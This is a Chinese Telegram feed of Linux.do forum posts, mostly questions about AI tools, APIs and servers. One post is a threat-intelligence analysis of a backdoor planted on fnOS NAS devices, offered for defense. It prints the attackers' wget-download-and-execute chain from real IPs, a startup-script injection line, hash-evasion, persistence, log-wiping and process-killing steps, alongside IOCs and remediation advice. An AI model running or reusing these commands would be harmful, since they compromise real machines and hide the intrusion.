LinuxDo 新帖推送
179 subscribers
249K photos
310K links
Download Telegram
标题: Antigravity今天不会Retry了吗?
作者: #夏日渐长
板块: #搞七捻三
编号: 1563363
帖子: https://linux.do/t/topic/1563363
时间: 2026-02-04 11:46:23
摘要:
Antigravity今天不会Retry了吗?
标题: 求助,Claude Cowork 不能正常使用
作者: #星尘
板块: #开发调优
编号: 1563375
帖子: https://linux.do/t/topic/1563375
时间: 2026-02-04 11:52:07
摘要:
有没有佬友可以看看最新版本的 Claude 客户端中的 Cowork 是否能够正常使用?
自从被 Claude 告知有资格去使用 Cowork,但是出于比较忙的原因一直未体验,昨天开始去试用了一下,发现发送任何指令都不能被执行。昨天还提示需要使用 /login 命令,但是输入了该命令 Cowork 直接无响应。今天连 /login 都不提示了,只提示没有授权,请求不被允许。
目前 Claude Code 和 Chat 都能正常使用,只有 Cowork 不行。
所以想请能使用 Cowork 的佬友帮忙诊断一下哪里出了问题。
标题: 「威胁情报」飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件
作者: #慕鸢
板块: #开发调优
编号: 1563376
帖子: https://linux.do/t/topic/1563376
时间: 2026-02-04 11:52:11
摘要:
漏洞编号:暂无(官方未公开 / 未分配 CVE)
重要等级:严重(高危)
CVSS 分数:暂无
影响范围:
fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发)
受影响系统:
fnOS(版本范围未公开)。官方社区回复称该问题官方已知,建议升级至 1.1.15,并在关闭公网端口映射后验证异常上传/连接是否停止。
木马行为分析
目前LoopDNS频道编辑已获取相关木马文件,下为行为分析

入侵者在通过未公开入口/利用链投放后门下载器后并执行
下载二阶段载荷并执行(观测到的命令链)
cd /tmp
wget http://20.89.168.131/nginx
chmod 777 nginx
head -c 16 /dev/urandom >> nginx(向文件追加随机字节,改变哈希,规避基于哈希的检测)
./nginx
wget http://20.89.168.131/trim_https_cgi
chmod 777 trim_https_cgi
head -c 16 /dev/urandom >> trim_https_cgi
./trim_https_cgi
外联与拉取补充组件
HTTP:GET http://151.240.13.91/trim_fnos
TCP:连接 45.95.212.102:6608

2.后门驻留组件 gots
A1. 写入后门主体与持久化文件
创建/写入:/sbin/gots
创建/写入:/etc/rc.local、/etc/rc.d/rc.local
创建/写入 systemd 服务(变种服务名):
/etc/systemd/system/x86.service
/etc/systemd/system/.service
执行持久化:systemctl enable .service(含重定向到 /dev/null 的静默执行)
自身复制/改名落地:
/usr/bin/x86(样本发生目录重命名/落地)
/usr/bin/(样本发生目录重命名/落地)
A2. C2 通信与探测
DNS:解析 aura.kabot.icu → 45.95.212.102
TCP:连接 45.95.212.102 多端口(观测到:3489、5098、6608、7489)
论坛样本显示的附加行为(strings/排查结论)
干扰系统工具:重命名/替换 cat(出现 mv /usr/bin/cat /usr/bin/cat2 等字符串,导致“cat 丢失”现象)
结束系统进程:pkill -f ‘network_service|resmon_service’
修改持久化入口:改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
外联:包含 45.95.212.102 字符串并进行访问

组件 trim_https_cgi

清理痕迹
清空多目录日志:/var/log/、/usr/trim/logs/、/run/log/journal 等
删除审计日志:/var/log/audit/audit.log 及滚动文件
删除/清理安全相关日志:/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等
干扰业务与恢复功能
结束服务:pkill -f backup_service、pkill -f sysrestore_service 等
二阶段下载执行与启动脚本注入
修改 /usr/trim/bin/system_startup.sh,追加下载执行链:
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
端口相关痕迹与疑似隐藏监听(来源于论坛排查)
目标系统存在 0.0.0.0:57132 LISTEN,ss/netstat 无 PID,lsof/fuser 无结果
trim_https_cgi 字符串包含 57132,并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑(提示该端口为其链路的一部分)
4.内核模块 snd_pcap(论坛排查)
/etc/modules 被追加 snd_pcap
模块文件:/lib/modules/6.12.18-trim/snd_pcap.ko
与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑(疑似内核层隐藏/驻留能力)
关键落地痕迹
不可变属性(immutable,需先 chattr -i 才能删除):
/usr/bin/nginx
/usr/sbin/gots
/usr/trim/bin/trim_https_cgi
/etc/systemd/system/nginx.service
/etc/systemd/system/trim_https_cgi.service
/etc/rc.local
伪装/复用:/usr/bin/nginx 与 /usr/sbin/gots md5 相同(同一载荷多名称投放)
rc.local 自启:/sbin/gots x86 &
systemd 自启(示例):ExecStart=/usr/bin/nginx x86(oneshot + enable)
可疑网络基础设施(IOC)
IP:45[.]95[.]212[.]102(C2/多端口连接)
IP:151[.]240[.]13[.]91(HTTP 拉取二阶段:/trim_fnos、论坛样本)
域名:aura[.]kabot[.]icu(解析到 45[.]95[.]212[.]102)
下载源:20[.]89[.]168[.]131(HTTP 拉取:/nginx、/trim_https_cgi)
归属信息:45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段
处置建议

关闭公网端口映射/源站直通。
升级 fnOS 至官方建议版本(1.1.15 或更高)。
出口防火墙封禁:45.95.212.102、151.240.13.91,同时监控连接数与上传是否回落。
轮换所有管理口令/密钥;检查容器、计划任务、数据盘是否存在触发残留(官方提示“重装后仍可能再次触发”)。

参考来源:飞牛社区
标题: 看到这个新闻绷不住了,元宝真被微信屏蔽了
作者: #k c
板块: #搞七捻三
编号: 1563380
帖子: https://linux.do/t/topic/1563380
时间: 2026-02-04 11:54:38
摘要:
之前看到有佬友的帖子,说微信怎么不屏蔽元宝,结果今天看到新闻,微信真的把元宝的分享链接屏蔽了张小龙狠起来自己都打
标题: 养基宝工具替代?
作者: #Tony_Stark
板块: #搞七捻三
编号: 1563386
帖子: https://linux.do/t/topic/1563386
时间: 2026-02-04 11:55:45
摘要:
养基宝这种软件的涨幅曲线看不到了,不知道各位大佬知不知道目前比较好用的替代软件(ios)
或者pc插件或者软件一类的
标题: 求推荐服务器,需要开放25端口,1c1g就好
作者: #IMCYCYC
板块: #搞七捻三
编号: 1563389
帖子: https://linux.do/t/topic/1563389
时间: 2026-02-04 11:56:17
摘要:
求推荐服务器,需要开放25端口,1c1g就好
自建邮箱转发用
标题: 黄金,每代人有每代人的庞氏骗局
作者: #YuRui
板块: #搞七捻三
编号: 1563392
帖子: https://linux.do/t/topic/1563392
时间: 2026-02-04 11:56:37
摘要:
眼看它起,眼看它落,眼看它又起。
赚钱也好,亏钱也罢。都是自己选的
标题: 做了一个用于收集设计风格的网站,希望可以帮助大家用AI更好的做前端界面
作者: #AnxForever
板块: #开发调优
编号: 1563397
帖子: https://linux.do/t/topic/1563397
时间: 2026-02-04 11:57:37
摘要:
开发时间较短,所以目前还很青涩,再加上本人能力有限,所以佬友们就图个新鲜就好。
它大概是个“设计风格库”:我把一些常见/好看的 UI 风格整理成了套装,比如新野兽派、玻璃态、新拟物这些。每个风格都配了比较完整的规范(配色、字体、间距、组件状态之类的)和对应的代码示例。
比较好玩的一点是:它是按“给 AI 用”的思路做的。你可以直接套我们准备的提示模板,让 Claude、v0 这类工具按某个指定风格生成页面/组件,不至于一会儿玻璃态一会儿极简,风格飘来飘去。
能做什么?

随便逛逛各种设计风格,找灵感
导出设计令牌(CSS 变量、Tailwind 预设等)
用提示生成器拼出更靠谱的提示词
顺手放了点可爱的卡通素材

也想拉大家一起完善一下(项目还很早期):
(1)提交新风格:你看到什么很酷的风格,来网站里提交一下就行,填个名字就能发,其他都是可选的。
(2)提 PR:代码在 GitHub,MIT 协议,欢迎加风格、改界面、修 bug、补文档都行。
(3)吐槽反馈:用起来哪里别扭、哪里不合理,直接评论/提 issue 都可以。
话不多说,一,二,三,上链接!
网址:https://www.stylekit.top/
项目地址:GitHub - AnxForever/stylekit: 精选优质 Web 设计风格,提供文档、组件模板、代码片段, 以及可直接导出的 AI Rules。
标题: 有没有佬知道酒馆的生图,能不能接第三方画图api呀,没找到入口
作者: #Li
板块: #搞七捻三
编号: 1563398
帖子: https://linux.do/t/topic/1563398
时间: 2026-02-04 11:58:03
摘要:
翻了一圈文档,只看到接入sd和comfyui的,没看到接第三方画图api的,有佬指导一下嘛
标题: 如何用deepseek实现skill
作者: #杰瑞米
板块: #开发调优
编号: 1563401
帖子: https://linux.do/t/topic/1563401
时间: 2026-02-04 11:58:23
摘要:
如何用deepseek实现skill?
标题: 现在还有哪些稳定便宜的gemini banana api可以用呢?
作者: #keyframes
板块: #搞七捻三
编号: 1563403
帖子: https://linux.do/t/topic/1563403
时间: 2026-02-04 11:58:38
摘要:
现在还有渠道可以推荐的吗?  花钱求稳定也行.
openrouter的模型好像和官方的不太一样, 没办法使用参考图片.
标题: 有使用serverbox手机版的吗?假死
作者: #离线
板块: #开发调优
编号: 1563406
帖子: https://linux.do/t/topic/1563406
时间: 2026-02-04 12:00:03
摘要:
安卓,自启和电池优化都做了。
打开ssh,切换到其他地方复制代码,再切换回serverbox,发现已经死了,只能重启app
标题: 站好最后一班岗
作者: #xiaer
板块: #搞七捻三
编号: 1563410
帖子: https://linux.do/t/topic/1563410
时间: 2026-02-04 12:00:51
摘要:
标题: 大家用openclaw接入的都是哪家的api啊,感觉太烧token了
作者: #香农
板块: #搞七捻三
编号: 1563415
帖子: https://linux.do/t/topic/1563415
时间: 2026-02-04 12:01:59
摘要:
kimi2.5有佬友试过没?效果怎么样
标题: 佬友们,powershell用cc,总认为自己是在容器里,怎么办?
作者: #bcoder
板块: #开发调优
编号: 1563416
帖子: https://linux.do/t/topic/1563416
时间: 2026-02-04 12:02:14
摘要:
标题: 开源软件 CodexManager 的UI和用量查询优化
作者: #qxnm
板块: #开发调优
编号: 1563420
帖子: https://linux.do/t/topic/1563420
时间: 2026-02-04 12:03:40
摘要:
更新了一个版本UI和用量查询超时的问题。
github 地址: hongshungao/Codex-Manager: 一个Codex cli 账号管理与切换工具。为 Codex cli提供本地号池管理自动切换。
目前发布了0.0.2版本的windows版本,持续优化中。。。
使用方法如下:
1、程序启动默认占用端口 localhost:5050
2、在账号管理新增账号登录的时候codex 的回调是localhost:1455 后台会启动一个监听,弹出登录之后就登陆成功了
3、创建平台key 创建之后自己记录一下
4、 配置auth.json 将你的key 放进去

5、配置config.toml (TOML)
[model_providers.custom]
name = “custom”
wire_api = “responses”
requires_openai_auth = false
base_url = “http://localhost:5050/v1”
配置好之后就是走的本地转发了,就可以畅快的用了。